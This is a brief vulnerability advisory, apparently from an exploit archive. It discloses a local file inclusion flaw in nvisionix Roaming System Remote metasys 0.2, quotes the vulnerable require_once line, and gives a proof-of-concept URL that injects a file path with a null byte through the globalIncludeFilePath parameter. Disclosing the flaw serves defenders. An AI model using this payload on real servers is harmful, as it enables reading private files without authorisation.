nvisionix Roaming System Remote metasys version 0.2 suffers from a local file inclusion vulnerability.
b9be354e82d57c4f7deaa02953e80b5ac0e0d369470d7bee527364a2667c04a8
nvisionix Roaming System Remote metasys 0.2 LFI Vulnerability
Site ................... : http://sourceforge.net/projects/irsr/
Download ............... : http://space.dl.sourceforge.net/project/irsr/irsr/irsr-0.2/irsr-0.2.ZIP
Author ................. : Treasure Priyamal
Contact ................ : treasure[at]treasuresec.com
Note : Successful exploitation requires that "register_globals" is enabled.
========================================================================
Description:
Your own portable PC system built by integrating existing Open Source components.
This mobile metasystem utilizes the internet's web hosting resources and is accessed
via any web browser enabled appliance from your home, work, school, library, cafes, etc
========================================================================
*************************************************
[!]This other sample vuln c0de which affected to LFI [!]
*************************************************
There is a vulnerability in almost every file directory , for example in this Directory file:
[-] system/default.php
require_once ($globalIncludeFilePath); // System's global include file.
-=[ P0C LFI ]=-
http://localhost/irsr/authenticate/sessions.php?globalIncludeFilePath=[LFI]%00
========================================================================